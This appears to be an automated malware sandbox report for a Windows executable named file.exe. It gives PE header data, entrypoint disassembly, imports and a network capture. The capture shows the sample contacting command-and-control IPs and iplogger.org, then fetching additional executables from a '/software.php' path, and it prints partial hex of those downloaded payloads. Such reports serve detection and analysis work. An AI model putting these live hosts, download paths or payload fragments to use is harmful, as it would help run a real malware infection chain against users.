                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:2d5ec24fb9d2ee4cf8208f9e16125d4f

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F5CD4CB928Bh
                                                          jmp 00007F5CD4CB5E1Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov ecx, dword ptr [esp+04h]
                                                          test ecx, 00000003h
                                                          je 00007F5CD4CB5FC6h
                                                          mov al, byte ptr [ecx]
                                                          add ecx, 01h
                                                          test al, al
                                                          je 00007F5CD4CB5FF0h
                                                          test ecx, 00000003h
                                                          jne 00007F5CD4CB5F91h
                                                          add eax, 00000000h
                                                          lea esp, dword ptr [esp+00000000h]
                                                          lea esp, dword ptr [esp+00000000h]
                                                          mov eax, dword ptr [ecx]
                                                          mov edx, 7EFEFEFFh
                                                          add edx, eax
                                                          xor eax, FFFFFFFFh
                                                          xor eax, edx
                                                          add ecx, 04h
                                                          test eax, 81010100h
                                                          je 00007F5CD4CB5F8Ah
                                                          mov eax, dword ptr [ecx-04h]
                                                          test al, al
                                                          je 00007F5CD4CB5FD4h
                                                          test ah, ah
                                                          je 00007F5CD4CB5FC6h
                                                          test eax, 00FF0000h
                                                          je 00007F5CD4CB5FB5h
                                                          test eax, FF000000h
                                                          je 00007F5CD4CB5FA4h
                                                          jmp 00007F5CD4CB5F6Fh
                                                          lea eax, dword ptr [ecx-01h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-02h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-03h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-04h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          cmp ecx, dword ptr [00435ADCh]
                                                          jne 00007F5CD4CB5FA4h
                                                          rep ret
                                                          jmp 00007F5CD4CB9273h
                                                          push eax
                                                          push dword ptr fs:[00000000h]
                                                          lea eax, dword ptr [esp+0Ch]
                                                          sub esp, dword ptr [esp+0Ch]
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          mov dword ptr [eax], ebp

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [C++] VS2008 build 21022
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe0fc0x50.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1910000x4bf8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x12100x1c.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x2c780x18.text
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c300x40.text
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000xdbf60xdc00False0.486328125data5.91189843213956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .data0xf0000x181d7c0x27600False0.9501674107142857data7.869383846999812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x1910000x4bf80x4c00False0.5950349506578947data5.615847517398622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x1912b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
                                                          RT_ICON0x191b580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216
                                                          RT_ICON0x1941000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                                                          RT_STRING0x1953a80x42data
                                                          RT_STRING0x1953f00x280data
                                                          RT_STRING0x1956700x3cedata
                                                          RT_STRING0x195a400x1b2data
                                                          RT_ACCELERATOR0x1951d80x80data
                                                          RT_GROUP_ICON0x1951a80x30data
                                                          RT_VERSION0x1952680x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                                                          None0x1952580xadata

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllLoadLibraryA, InterlockedPushEntrySList, GetConsoleAliasesW, ReadFile, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, LocalFree, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeA, FindCloseChangeNotification, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoW, LocalSize, FileTimeToDosDateTime, DebugBreak, GlobalGetAtomNameW, IsBadWritePtr, FindResourceA, GetComputerNameExW, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthW, GetVolumeNameForVolumeMountPointA, DeleteVolumeMountPointA, GetCPInfo, PostQueuedCompletionStatus, MoveFileWithProgressA, CopyFileA, lstrcpynW, WriteConsoleW, GetBinaryTypeA, WriteConsoleOutputW, GetCommandLineA, InterlockedIncrement, CreateActCtxW, FormatMessageA, GetModuleHandleW, GetModuleHandleA, LeaveCriticalSection, GetStringTypeExA, OpenMutexW, FindResourceW, RtlCaptureContext, InterlockedExchange, InitializeCriticalSectionAndSpinCount, DeleteFiber, InterlockedExchangeAdd, EnumDateFormatsA, GetPrivateProfileStructA, GetNamedPipeHandleStateW, RegisterWaitForSingleObject, LocalAlloc, QueryMemoryResourceNotification, SetLastError, GetProcessPriorityBoost, GetMailslotInfo, HeapWalk, SetFilePointer, SetConsoleMode, RaiseException, RtlUnwind, GetLastError, MoveFileA, DeleteFileA, GetStartupInfoA, HeapAlloc, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LCMapStringA, LCMapStringW
                                                          USER32.dllCharUpperBuffW
                                                          WINHTTP.dllWinHttpCreateUrl

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 3, 2022 17:32:28.535988092 CEST4971380192.168.2.3208.67.104.97
                                                          Oct 3, 2022 17:32:28.563182116 CEST8049713208.67.104.97192.168.2.3
                                                          Oct 3, 2022 17:32:28.563281059 CEST4971380192.168.2.3208.67.104.97
                                                          Oct 3, 2022 17:32:28.566678047 CEST4971380192.168.2.3208.67.104.97
                                                          Oct 3, 2022 17:32:28.595074892 CEST8049713208.67.104.97192.168.2.3
                                                          Oct 3, 2022 17:32:30.576921940 CEST8049713208.67.104.97192.168.2.3
                                                          Oct 3, 2022 17:32:30.579190969 CEST4971380192.168.2.3208.67.104.97
                                                          Oct 3, 2022 17:32:32.580998898 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.608573914 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.608735085 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.611027956 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.639991045 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641341925 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641400099 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641441107 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641448021 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.641483068 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641499043 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.641499996 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.641522884 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.641531944 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641571045 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.641577959 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641614914 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.641622066 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641659975 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.641664028 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641700983 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.641710043 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641751051 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.641756058 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.641794920 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669034004 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669114113 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669121027 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669161081 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669171095 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669205904 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669207096 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669250965 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669254065 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669296026 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669300079 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669337034 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669339895 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669379950 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669382095 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669424057 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669426918 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669467926 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669478893 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669512033 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669521093 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669547081 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669555902 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669596910 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669598103 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669640064 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669673920 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669682026 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669708014 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669724941 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669728041 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669768095 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669799089 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669814110 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669850111 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669857025 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669883013 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669899940 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.669900894 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.669943094 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697029114 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697113991 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697184086 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697211981 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697252989 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697254896 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697261095 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697346926 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697364092 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697434902 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697469950 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697482109 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697484970 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697524071 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697530985 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697571039 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697575092 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697613955 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697618008 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697663069 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697674990 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697705030 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697706938 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697746992 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697751999 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697803020 CEST4971480192.168.2.385.31.46.167
                                                          Oct 3, 2022 17:32:32.697808027 CEST804971485.31.46.167192.168.2.3
                                                          Oct 3, 2022 17:32:32.697846889 CEST4971480192.168.2.385.31.46.167

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 3, 2022 17:33:21.442984104 CEST4930253192.168.2.38.8.8.8
                                                          Oct 3, 2022 17:33:21.462057114 CEST53493028.8.8.8192.168.2.3

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 3, 2022 17:33:21.442984104 CEST192.168.2.38.8.8.80x794dStandard query (0)iplogger.orgA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 3, 2022 17:33:21.462057114 CEST8.8.8.8192.168.2.30x794dNo error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • iplogger.org
                                                          • 208.67.104.97
                                                          • 85.31.46.167
                                                          • 107.182.129.235
                                                          • 171.22.30.106

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.349723148.251.234.83443C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.349713208.67.104.9780C:\Users\user\Desktop\file.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 3, 2022 17:32:28.566678047 CEST104OUTGET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 1
                                                          Host: 208.67.104.97
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:32:30.576921940 CEST105INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:32:28 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.34971485.31.46.16780C:\Users\user\Desktop\file.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 3, 2022 17:32:32.611027956 CEST105OUTGET /software.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: D
                                                          Host: 85.31.46.167
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:32:32.641341925 CEST107INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:32:32 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Pragma: public
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Cache-Control: private
                                                          Content-Disposition: attachment; filename="dll";
                                                          Content-Transfer-Encoding: binary
                                                          Content-Length: 242176
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: application/octet-stream
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{
                                                          Oct 3, 2022 17:32:33.214382887 CEST364OUTGET /software.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: E
                                                          Host: 85.31.46.167
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:32:33.246129036 CEST365INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:32:33 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Pragma: public
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Cache-Control: private
                                                          Content-Disposition: attachment; filename="soft";
                                                          Content-Transfer-Encoding: binary
                                                          Content-Length: 3947920
                                                          Keep-Alive: timeout=5, max=99
                                                          Connection: Keep-Alive
                                                          Content-Type: application/octet-stream
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ ``TO 2(<@8 H.text `.rsrc2 @@.reloc@@BHh@ET;(*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
